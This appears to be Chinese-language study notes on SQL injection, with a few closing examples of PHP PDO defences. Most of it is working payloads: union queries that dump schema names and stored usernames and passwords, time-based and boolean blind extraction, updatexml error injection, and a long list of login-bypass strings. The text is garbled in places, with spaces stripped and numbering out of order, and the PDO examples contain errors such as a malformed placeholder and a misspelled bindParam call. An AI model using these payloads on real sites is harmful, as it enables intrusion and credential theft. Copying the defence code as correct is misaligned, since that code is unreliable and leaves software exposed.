select*from news where id=1or1=1 #逻辑为真,返回正常页面select*from news where id=1and1=2 #逻辑为假,返回其他页面
2.判断列名数量
select*from news where id=1order by2 #可通过二分法来判断列名数量
3.判断那些列名能显值
因为要确定将sql注入语句写入到能显值得列名中
select*from news where id=1unionselect1,2 #看看哪个列名能显示值
4.获取所有数据库名
#从information_schema.schemata表中获取所有的数据库名字select*from news where id=1unionselect schema_name,2from information_schema.schemata
5.获取指定数据库的所有表名
#从information_schema.tables表中获取名为"sql"的数据库下的所有表名select*from news where id=1unionselect table_name,2from information_schema.tables where table_schema="sql"
6.获取指定表的所有列名
#从information_schema.columns获取名为"news"的表下的所有列名select*from news where id=1unionselect column_name,2from information_schema.columns where table_name="news"
7.获取指定数据库、表、列下的值
#从sql数据库的news表中获取列名为username和password的值select*from news where id=1unionselect username,passwordfrom sql.news
#从information_schema.tables表中猜名为"database"的数据库的表的长度id=1 and sleep(if(length((select table_name from information_schema.tables where table_schema="database" limit 0,1))=5,0,5))
id=1 and sleep(if(length((select table_name from information_schema.tables where table_schema="database" limit 1,1))=5,0,5))
4.猜指定数据库的表的名字:
#从information_schema.tables表中猜名为"database"的数据库的表的名字id=1 and sleep(if(ord(mid((select table_name from information_schema.tables where table_schema="database" limit 0,1),1,1))=115,0,5))
id=1 and sleep(if(ord(mid((select table_name from information_schema.tables where table_schema="database" limit 1,1),1,1))=115,0,5))
5.猜指定表的字段的长度:
#从information_schema.columns表中猜名为"users"的表的字段的长度id=1 and sleep(if(length((select column_name from information_schema.columns where table_name="users" limit 0,1))=1,0,5))
id=1 and sleep(if(length((select column_name from information_schema.columns where table_name="users" limit 1,1))=1,0,5))
6.猜指定表的字段的名字:
#从information_schema.columns表中猜名为"users"的表的字段的名字id=1 and sleep(if(ord(mid((select column_name from information_schema.columns where table_name="users" limit 0,1),1,1))=115,0,5))
id=1 and sleep(if(ord(mid((select column_name from information_schema.columns where table_name="users" limit 1,1),1,1))=115,0,5))
7.猜指定数据库,表名、列名的值:
#从database.users表中猜用户和密码的长度id=1and sleep(if(length((select user,pass from database.users))=1,0,5)) #从database.users表中猜用户和密码的内容id=1and sleep(if(ord(mid((select user,pass from database.users),1,1))=115,0,5))
基于布尔的盲注
和上面的时间盲注流程差不多
id=1 and length(database())=1
id=1 and ord(mid(database(),1,1))=115
四种报错注入
1.Insert注入
针对用户注册页面,可以在账号框或者密码框注入sql语句, 这里演示在密码框插入sql语句
payload:mima' or updatexml (1,concat(0x7e,(version()),0),0) or '
构成的完整sql语句:INSERT INTO news(users,pass) VALUES ('xf123er','mima' or updatexml (1,concat(0x7e,(version()) or '')
此处演示的sql查询语句: select * from users where user='$user' and pass='$password'
user字段注入
构造user字段的值:admin'#
完整sql查询语句:select * from users where user='admin'#' and pass='$password'
实际sql查询语句:select * from users where user='admin'
pass字段注入
**构造pass字段的值: ** 'or 1=1 or'
完整sql查询语句:select * from users where user='$user' and pass=''or 1=1 or''
实际sql查询语句:select * from users where true
mysql逻辑判断是从前往后排,==假and假or真or假==的整体逻辑为==真==
常用万能密码
' or 1='1
'or'='or'
admin
admin'--
admin' or 4=4--
admin' or '1'='1'--
admin888
"or "a"="a
admin' or 2=2#
a' having 1=1#
a' having 1=1--
admin' or '2'='2
')or('a'='a
or 4=4--
c
a'or' 4=4--
"or 4=4--
'or'a'='a
"or"="a'='a
'or''='
'or'='or'
1 or '1'='1'=1
1 or '1'='1' or 4=4
'OR 4=4%00
"or 4=4%00
'xor
admin' UNION Select 1,1,1 FROM admin Where ''='
1
-1%cf' union select 1,1,1 as password,1,1,1 %23
1
17..admin' or 'a'='a 密码随便
'or'='or'
'or 4=4/*
something
' OR '1'='1
1'or'1'='1
admin' OR 4=4/*
1'or'1'='1
PDO技术防御sql注入
调用quote函数
<?php@$id =addcslashes($_GET['X']); //对GET参数采取单双引号过滤机制error_reporting(E_ALL^E_DEPRECATED);$pdo =newPDO('mysql:host=localhost;dbname=test','root','root'); //创对象建PDO$id = $pdo->quote($id); //调用quote函数$sql ="select * from users where id=$id";if ($row = $pdo->query($sql)) {foreach($row as $key => $value){print_r($value); } }echo $sql;?>
预处理sql语句:
1、通过命名参数防止注入
<?php@$id =addcslashes($_GET['X']);error_reporting(E_ALL^E_DEPRECATED);$pdo =newPDO('mysql:host=localhost;dbname=test','root','root'); $sql ="select * from users where id:$id"; //定义sql语句$stmt = $pdo->prepare($sql); //预处理sql语句$stmt->execute(array(":id"=>$id)); //execute参数为数组,执行预处理过的sql语句echo $stmt->rowCount(); //返回执行sql语句后的结果命令行,大于0为成功,等于0为失败?>
2、通过问号占位符防止注入
<?php@$id =addcslashes($_GET['X']);error_reporting(E_ALL^E_DEPRECATED);$pdo =newPDO('mysql:host=localhost;dbname=test','root','root'); $sql ="select * from users where id=?";$stmt = $pdo->prepare($sql); //预处理sql语句$stmt->execute(array($id)); //execute参数为数组,执行预处理过的sql语句echo $stmt->rowCount(); //返回执行sql语句后的结果命令行,大于0为成功,等于0为失败?>
3、通过bindParam()绑定参数
<?php@$id =addcslashes($_GET['X']);error_reporting(E_ALL^E_DEPRECATED);$pdo =newPDO('mysql:host=localhost;dbname=test','root','root'); $sql ="select * from users where id:$id";$stmt = $pdo->prepare($sql); //预处理sql语句$stmt->bindParm(":id",$id,PDO::PARAM_STR);$stmt->execute();echo $stmt->rowCount();?>